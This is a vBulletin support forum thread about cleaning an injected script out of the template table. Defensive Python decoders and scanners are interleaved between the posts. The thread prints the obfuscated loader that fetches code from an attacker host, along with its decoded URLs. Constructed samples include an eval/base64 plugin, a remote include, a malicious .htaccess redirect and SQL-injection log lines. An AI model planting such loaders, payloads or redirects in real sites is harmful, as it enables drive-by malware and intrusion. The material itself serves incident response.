A fix if your site is already exploited

  • Mitchh
    New Member
    • Sep 2009
    • 5
    • 3.8.x

    [Forum] A fix if your site is already exploited

    Hey guys,

    I've seen this more than a few times and it's all the same problem. Some code gets injected into the database on the template table. Here is the code:

    Code:
    var script=document.createElement(String.fromCharCode(115,99,114,105,112,116));script.src=String.fromCharCode(104,116,116,112,58,47,47,105,109,97,103,101,50,121,111,117,46,105,110,47,106,113,117,101,114,121,46,99,111,109,112,97,116,105,98,105,108,105,116,121,46,106,115);var head=document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0];head.appendChild(script);
    If you decode the numbers from the second fromCharCode() you get the following URL:

    http://image2you.in/jquery.compatibility.js

    This URL loads http://directmarketingmanage.in/in.cgi?walter into a secret iframe, which some antivirus software such as Avast complains about. To fix the problem, go in phpMyAdmin, go to your database, then hit Search. Look for 'vBulletin_init' without the quotes in only the template table. On this page just right-click Edit on every one it found and open in a new tab. Now just search on the page for vBulletin_init till you find it in the table and remove the code listed above. How this got injected into my database I have no idea... can has patch?
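
The injected line above decodes mechanically. The following Python is an added example, not code from the original post or from vBulletin: it takes the posted line as its input, turns each String.fromCharCode(...) list back into text, and also handles the two other encodings this kind of script dropper commonly uses, "\x68\x74" hex escapes and unescape("%68%74"), folding "a" + "b" concatenations so a URL split across literals reads whole. The second sample (example.com) is constructed for illustration. The host the posted line loads from is an attacker indicator: decode it and block it, but do not fetch it.

```python
import json
import re
from urllib.parse import unquote

# The injected line exactly as posted above: attacker code kept only as input to decode.
INJECTED = (
    "var script=document.createElement(String.fromCharCode(115,99,114,105,112,116));"
    "script.src=String.fromCharCode(104,116,116,112,58,47,47,105,109,97,103,101,50,121,111,117,"
    "46,105,110,47,106,113,117,101,114,121,46,99,111,109,112,97,116,105,98,105,108,105,116,121,"
    "46,106,115);"
    "var head=document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0];"
    "head.appendChild(script);"
)
# Constructed second sample (example.com, not from the thread) using the other two
# encodings droppers commonly use: "\x68" hex escapes and unescape("%68").
SAMPLE_HEX = ('var s=document.createElement("script");'
              's.src="\\x68\\x74\\x74\\x70://" + unescape("%65%78%61%6d%70%6c%65%2e%63%6f%6d%2f%61%2e%6a%73");'
              'document.body.appendChild(s);')

FROMCHARCODE = re.compile(r"String\.fromCharCode\(\s*([0-9\s,]+?)\s*\)")
UNESCAPE_CALL = re.compile(r"\bunescape\(\s*(['\"])(.*?)\1\s*\)")
HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")
CONCAT = re.compile(r'"([^"\\]*)"\s*\+\s*"([^"\\]*)"')   # "a" + "b"  ->  "ab"


def _codes_to_text(codes):
    """'104,116,116,112' -> 'http'."""
    return "".join(chr(int(n)) for n in codes.split(",") if n.strip())


def decode_fromcharcode(source):
    """Every String.fromCharCode(...) literal in source, decoded, in order of appearance."""
    return [_codes_to_text(m.group(1)) for m in FROMCHARCODE.finditer(source)]


def deobfuscate(source):
    """Rewrite char-code lists, unescape() calls and \\xNN escapes as plain JS string
    literals, then fold "a" + "b" concatenations so split URLs read whole."""
    out = FROMCHARCODE.sub(lambda m: json.dumps(_codes_to_text(m.group(1))), source)
    out = UNESCAPE_CALL.sub(lambda m: json.dumps(unquote(m.group(2))), out)
    out = HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), out)
    while True:
        folded = CONCAT.sub(lambda m: json.dumps(m.group(1) + m.group(2)), out)
        if folded == out:
            return out
        out = folded


def extract_urls(source):
    """URLs that only appear after decoding; treat them as indicators, do not fetch them."""
    return re.findall(r"https?://[^\s\"'<>]+", deobfuscate(source))


if __name__ == "__main__":
    for sample in (INJECTED, SAMPLE_HEX):
        print(deobfuscate(sample))
        print("  loads:", extract_urls(sample))
```

For a real investigation, feed the content of the suspect template row (or a dump of the whole template table) to deobfuscate() and search the result for src= and iframe; a plain text search for the URL in phpMyAdmin will never match its char-code form.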
  • Trevor Hannant
    vBulletin Support
    • Aug 2002
    • 24325
    • 5.7.X

    #2
    What modifications are you running?
    Vote for:

    - Admin Settable Paid Subscription Reminder Timeframe (vB6)
    - Add Admin ability to auto-subscribe users to specific channel(s) (vB6)

    Comment

    • Mr Jolly
      Member
      • Feb 2008
      • 93
      • 3.6.x

      #3
      Does this really fix it for good?

      Comment

      • Wayne Luke
        vBulletin Technical Support Lead
        • Aug 2000
        • 73981

        #4
        Originally posted by Mr Jolly
        Does this really fix it for good?
        Doubtful. Can't fix it for good without knowing the vector it was inserted in. Since it can only be found via a database search and not by looking in the footer template, the exploit points to a direct database insertion either via remote access to the database or through a plugin installed in the system. The following steps will check your code for compromises.

        1) Run Suspect File Diagnostics under Maintenance -> Diagnostics. Replace any files not containing the expected contents. Delete any files that are not part of vBulletin and that you can't identify as belonging to your addons.

        2) Check the config.php for any suspicious code. It isn't checked by the suspect file diagnostic.

        3) Search all templates for iframe tags. They should only appear in the following templates: bbcode_video, editor-ie.css, member.css, stylegenerator.css, vbcms.css, vbulletin.css, help_bbcodes, humanverify_recaptcha, search_common, and search_common_select_type

        4) Check all your plugins for rogue include, require, include_once, or require_once code. All files should come from your server and be known to you.

        5) Check your plugins for any base64 code. I recommend against using any plugins or products that include base64 code in them. However some "lite" or branded addons will include this as a means to prevent you from cheating the author. You'll have to make a personal call on these if you use them. This is often a sign of a hacked site.

        6) Make sure that your plugins do not include calls to exec(), system(), or pass_thru() or iframes. These are also often signs of a hacked site.

        Query for step 4 and 5 -
        SELECT title, phpcode, hookname, product FROM plugin WHERE phpcode LIKE '%base64%' OR phpcode LIKE '%exec%' OR phpcode LIKE '%system%' OR phpcode like '%pass_thru%' OR phpcode like '%iframe%';

        7) Run this query: SELECT styleid, title, template FROM template WHERE template LIKE '%base64%' OR template LIKE '%exec%' OR template LIKE '%system%' OR template like '%pass_thru%' OR template like '%iframe%';

        It checks the templates for compromising code.

        8) Check .htaccess to make sure there are no redirects there.
        Translations provided by Google.

        Wayne Luke
        The Rabid Badger - a vBulletin Cloud demonstration site.
        vBulletin 5 API

        Comment
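
The eight steps above are a manual sweep. The Python below is an added example, not part of vBulletin or of the post: it runs the same checks offline over rows exported from the template and plugin tables, over a style export XML (its <templategroup><template name="..."> layout is assumed from vBulletin 3/4 exports), and over an .htaccess file. Two refinements over the LIKE queries: function calls are matched on word boundaries, so a template containing "system_status" or a comment saying "executes" does not drown real hits, and any base64 literal is decoded so you can see what the blob is before deciding whether a "lite" add-on is merely branded or actually backdoored. Note also that PHP's function is spelled passthru(), so LIKE '%pass_thru%' in the queries above will not match a call to it; the script matches the real name. All rows below are constructed samples; the hidden-iframe row reuses the URL reported in the first post.

```python
import base64
import re
import xml.etree.ElementTree as ET

# Templates that legitimately contain <iframe> (the allowlist from step 3 above).
IFRAME_ALLOWED = {
    "bbcode_video", "editor-ie.css", "member.css", "stylegenerator.css", "vbcms.css",
    "vbulletin.css", "help_bbcodes", "humanverify_recaptcha", "search_common",
    "search_common_select_type",
}
IFRAME = re.compile(r"<iframe\b", re.I)
HIDDEN_IFRAME = re.compile(r"<iframe\b[^>]*(?:width\s*=\s*['\"]?0\b|height\s*=\s*['\"]?0\b"
                           r"|display\s*:\s*none|visibility\s*:\s*hidden)", re.I)
OBFUSCATED_JS = re.compile(r"String\.fromCharCode|\bunescape\s*\(|\\x[0-9a-f]{2}", re.I)
# Calls matched on word boundaries, so "system_status" or "executes" in a comment
# do not fire the way LIKE '%system%' / LIKE '%exec%' do.
PHP_SUSPICIOUS = re.compile(r"\b(eval|exec|shell_exec|system|passthru|popen|proc_open"
                            r"|base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I)
BASE64_LITERAL = re.compile(r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]{8,})['\"]")
REMOTE_INCLUDE = re.compile(r"\b(?:include|require)(?:_once)?\s*\(?\s*['\"](?:https?|ftp|php|data):", re.I)
HTACCESS_REDIRECT = re.compile(r"^(?:Redirect(?:Match|Permanent|Temp)?|RewriteRule|ErrorDocument)\b.*https?://", re.I)

# Constructed sample rows in the shape of the template and plugin tables.
SAMPLE_TEMPLATES = [
    {"styleid": 1, "title": "footer",
     "template": '<div id="footer">...</div>\n<script type="text/javascript">vBulletin_init();'
                 'var script=document.createElement(String.fromCharCode(115,99,114,105,112,116));'
                 'head.appendChild(script);</script>'},
    {"styleid": 1, "title": "bbcode_video",
     "template": '<iframe src="{vb:raw url}" width="{vb:raw width}" height="{vb:raw height}"></iframe>'},
    {"styleid": 2, "title": "header",
     "template": '<iframe src="http://directmarketingmanage.in/in.cgi?walter" width="0" height="0" style="visibility:hidden"></iframe>'},
    {"styleid": 1, "title": "search_results",   # LIKE '%system%' and '%exec%' would both hit this
     "template": '<div class="system_status">exec summary: {vb:raw results}</div>'},
]
SAMPLE_PLUGINS = [
    {"product": "post_thanks", "hookname": "postbit_display_complete", "title": "Thanks counter",
     "phpcode": '// runs after the system loads\n$count = $vbulletin->db->query_first("SELECT COUNT(*) AS c FROM " . TABLE_PREFIX . "post_thanks");'},
    {"product": "vbulletin", "hookname": "global_start", "title": "Cache warmup",
     "phpcode": "eval(base64_decode('cGhwaW5mbygpOw=='));"},   # constructed: decodes to phpinfo();
    {"product": "example_addon", "hookname": "init_startup", "title": "Remote helper",
     "phpcode": "include_once('http://example.com/helper.txt');"},
]
SAMPLE_HTACCESS = """RewriteEngine On
RewriteRule ^(.*)$ index.php [L]
RewriteCond %{HTTP_REFERER} (google|bing) [NC]
RewriteRule ^(.*)$ http://directmarketingmanage.in/in.cgi?walter [R=302,L]
"""
SAMPLE_STYLE_XML = """<style name="Example Skin" vbversion="3.8.7" product="vbulletin" type="custom">
  <templategroup name="Forum Home Templates">
    <template name="footer" templatetype="template"><![CDATA[<div id="footer"></div>
<script>var s=document.createElement(String.fromCharCode(115,99,114,105,112,116));</script>]]></template>
    <template name="navbar" templatetype="template"><![CDATA[<div class="navbar">$navbar</div>]]></template>
  </templategroup>
</style>
"""


def scan_templates(rows):
    """(styleid, title, rule) for rows with an iframe outside the allowlist or obfuscated JS."""
    findings = []
    for row in rows:
        body = row["template"]
        if IFRAME.search(body) and row["title"] not in IFRAME_ALLOWED:
            rule = "hidden iframe" if HIDDEN_IFRAME.search(body) else "iframe outside allowlist"
            findings.append((row["styleid"], row["title"], rule))
        if OBFUSCATED_JS.search(body):
            findings.append((row["styleid"], row["title"], "obfuscated JavaScript"))
    return findings


def scan_plugins(rows):
    """(product, title, rule) for plugins that call execution/obfuscation functions,
    carry a base64 literal (shown decoded), or include/require from a URL."""
    findings = []
    for row in rows:
        code, key = row["phpcode"], (row["product"], row["title"])
        for m in PHP_SUSPICIOUS.finditer(code):
            findings.append(key + ("calls %s()" % m.group(1).lower(),))
        for m in BASE64_LITERAL.finditer(code):
            try:
                decoded = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
            except ValueError:
                decoded = "<not valid base64>"
            findings.append(key + ("base64 literal decodes to %r" % decoded,))
        if REMOTE_INCLUDE.search(code):
            findings.append(key + ("include/require from a URL",))
    return findings


def scan_htaccess(text):
    """Directives that redirect to an absolute http(s) URL (step 8)."""
    return [ln.strip() for ln in text.splitlines() if HTACCESS_REDIRECT.match(ln.strip())]


def templates_from_style_xml(xml_text, styleid=0):
    """Rows for scan_templates() from a style export, so an imported skin can be checked too."""
    root = ET.fromstring(xml_text)
    return [{"styleid": styleid, "title": t.get("name"), "template": t.text or ""}
            for t in root.iter("template")]
```

For real data, export the rows with SELECT styleid, title, template, dateline, username FROM template and SELECT product, hookname, title, phpcode FROM plugin and feed them in; the dateline and username columns on the flagged template row tell you when, and under which account, that template was last saved, which narrows the window to look at in the web access log.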

        • Mr Jolly
          Member
          • Feb 2008
          • 93
          • 3.6.x

          #5
          I've uninstalled all the plugins I was using and removed all the files associated with them. Had a right good clear out. I have kept vBSEO though, and to be honest I think they're in the clear. I've seen another forum with this same problem and they weren't running vBSEO, so fingers crossed on that one.

          Comment

          • .Josh
            Senior Member
            • Dec 2009
            • 129
            • 4.1.x

            #6
            What mod/plugin was doing this?

            Comment

            • Wayne Luke
              vBulletin Technical Support Lead
              • Aug 2000
              • 73981

              #7
              Originally posted by .Josh
              What mod/plugin was doing this?
              No one has established that it is indeed a mod or plugin causing the problem. That is just one possible vector for exploits.
              Translations provided by Google.

              Wayne Luke
              The Rabid Badger - a vBulletin Cloud demonstration site.
              vBulletin 5 API

              Comment

              • Mr Jolly
                Member
                • Feb 2008
                • 93
                • 3.6.x

                #8
                Originally posted by .Josh
                What mod/plugin was doing this?
                What plugins do you use and we'll compare which ones it could have been.

                Comment

                • Mark.B
                  vBulletin Support
                  • Feb 2004
                  • 24286
                  • 6.0.X

                  #9
                  Originally posted by Mr Jolly
                  What plugins do you use and we'll compare which ones it could have been.
                  That's not necessarily helpful, it panics people.
                  MARK.B
                  vBulletin Support
                  ------------
                  My Unofficial vBulletin 6.0.0 Demo: https://www.talknewsuk.com
                  My Unofficial vBulletin Cloud Demo: https://www.adminammo.com

                  Comment

                  • mainframe
                    Senior Member
                    • Jul 2004
                    • 151
                    • 3.6.x

                    #10
                    Originally posted by Mark.B
                    That's not necessarily helpful, it panics people.
                    Yes, but it would also help to identify the problem, in cases of SQL injection it's vital to find this fast.
                    Sat-Television.com Forum:
                    http://www.satfriends.com/

                    Sat-Television.com Upload Center:
                    http://www.satfriends.com/ulc.php

                    Comment

                    • Wayne Luke
                      vBulletin Technical Support Lead
                      • Aug 2000
                      • 73981

                      #11
                      Originally posted by mainframe
                      Yes, but it would also help to identify the problem, in cases of SQL injection it's vital to find this fast.
                      Unless you know PHP and review the code of all your plugins, you'll never be able to find a SQL injection by comparing addons. If you're looking for a SQL injection, you should review your web access log because these are done via the URL.

                      A plugin can do direct access to the database as it has access to vBulletin's engine. As such it doesn't need to resort to SQL Injections, it just runs code.
                      Translations provided by Google.

                      Wayne Luke
                      The Rabid Badger - a vBulletin Cloud demonstration site.
                      vBulletin 5 API

                      Comment
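
As an added example (not from the post), here is a Python pass over an Apache access log that does what the reply recommends: look for injection attempts in the request URL. It percent-decodes each path repeatedly, because double encoding (%2527 for the quote) is a common way past naive filters, then checks a handful of SQL fingerprints. The log lines are constructed samples using documentation IP ranges. Two caveats: POST bodies are not in an access log, so an injection through a form field leaves only the request path; and a single quote in a search query is normal on a forum, so review hits by hand and cross-check their timestamps against when the template row was last saved.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-format lines (203.0.113.0/24 and 198.51.100.0/24 are documentation ranges).
SAMPLE_LOG = """\
203.0.113.5 - - [01/Mar/2012:15:07:41 +0000] "GET /forum/showthread.php?t=1234 HTTP/1.1" 200 18273 "-" "Mozilla/5.0"
203.0.113.9 - - [01/Mar/2012:15:08:02 +0000] "GET /forum/showthread.php?t=1234%27%20UNION%20SELECT%201,2,3,template%20FROM%20template--%20 HTTP/1.1" 200 502 "-" "Mozilla/5.0"
203.0.113.9 - - [01/Mar/2012:15:08:10 +0000] "GET /forum/search.php?q=1%2527%2520AND%2520SLEEP%25285%2529 HTTP/1.1" 200 310 "-" "python-requests/2.0"
203.0.113.12 - - [01/Mar/2012:15:09:00 +0000] "GET /forum/showthread.php?t=5678&p=10 HTTP/1.1" 200 900 "-" "Mozilla/5.0"
198.51.100.4 - - [01/Mar/2012:15:09:30 +0000] "GET /forum/forumdisplay.php?f=2&order=desc HTTP/1.1" 200 4000 "-" "Mozilla/5.0"
"""

LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')

# Fingerprints checked against the fully decoded path. Order determines the order of names in a hit.
SQLI_PATTERNS = [
    ("union select", re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.I)),
    ("quote + boolean test", re.compile(r"['\"]\s*(?:or|and)\s+[\w'\"]+\s*=\s*[\w'\"]+", re.I)),
    ("time-based probe", re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I)),
    ("comment terminator", re.compile(r"--\s|/\*")),
    ("schema/file access", re.compile(r"\binformation_schema\b|\bload_file\s*\(|\binto\s+(?:out|dump)file\b", re.I)),
]


def fully_decode(s, rounds=3):
    """Undo percent-encoding until it stops changing; attackers double-encode to evade filters."""
    for _ in range(rounds):
        decoded = unquote_plus(s)
        if decoded == s:
            break
        s = decoded
    return s


def scan_access_log(text):
    """(ip, timestamp, decoded_path, [pattern names]) for requests whose URL looks like SQL injection."""
    hits = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue   # not a combined-format line; skip rather than guess
        ip, when, method, path, status, size = m.groups()
        decoded = fully_decode(path)
        names = [name for name, rx in SQLI_PATTERNS if rx.search(decoded)]
        if names:
            hits.append((ip, when, decoded, names))
    return hits


if __name__ == "__main__":
    for ip, when, path, names in scan_access_log(SAMPLE_LOG):
        print(ip, when, ", ".join(names))
        print("   ", path)
```

Run it over the real log with scan_access_log(open("access.log").read()); group the hits by IP and look at everything else that address did around the same time, since the request that planted the template edit may itself look ordinary (an admin-control-panel login or a plugin's own page) once the injection has given the attacker what they needed.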

                      • Jaxo
                        Member
                        • Dec 2011
                        • 36

                        #12
                        I had this same problem... turned out to be a blue pearl skin

                        "EDIT"

                        Idk what is causing this prob... not the skin after reinstall
                        Last edited by Jaxo; Thu 1 Mar '12, 3:08pm.

                        Comment

                        • ZeroHour
                          Senior Member
                          • Sep 2007
                          • 167

                          #13
                          Originally posted by Jaxo
                          I had this same problem... turned out to be a blue pearl skin

                          http://www.bluepearl-skins.com/forum...-into-website/
                          Erm, have they confirmed that, or have you found the code in the template files' XML?
                          If someone breached, they would put the template edit into your default style, which was Blue Pearl, but not necessarily the master/every style.
                          Try reimporting the skin or doing a search for the code in the skin's import XML.

                          Comment

                          • Jaxo
                            Member
                            • Dec 2011
                            • 36

                            #14
                            Thanks Zero hour, I will try this now and post back...

                            TBH this whole vBulletin thing is a let-down. I ran a phpBB site for 3 years and don't know why I bothered moving to vB; basically IMO it's an unsafe, unreliable product. 2 months I've had it and have had it so far, and every time I update it there is another frecking update. Can they not do it correctly the first time, or is it just an insecure product?
                            Last edited by Jaxo; Thu 1 Mar '12, 3:07pm.

                            Comment

                            • Jaxo
                              Member
                              • Dec 2011
                              • 36

                              #15
                              OK, it appears you are correct. I removed the skin and reinstalled and it's clean. Thank you

                              I notice original post is from 2009,.. still no proper fix for this?

                              Comment
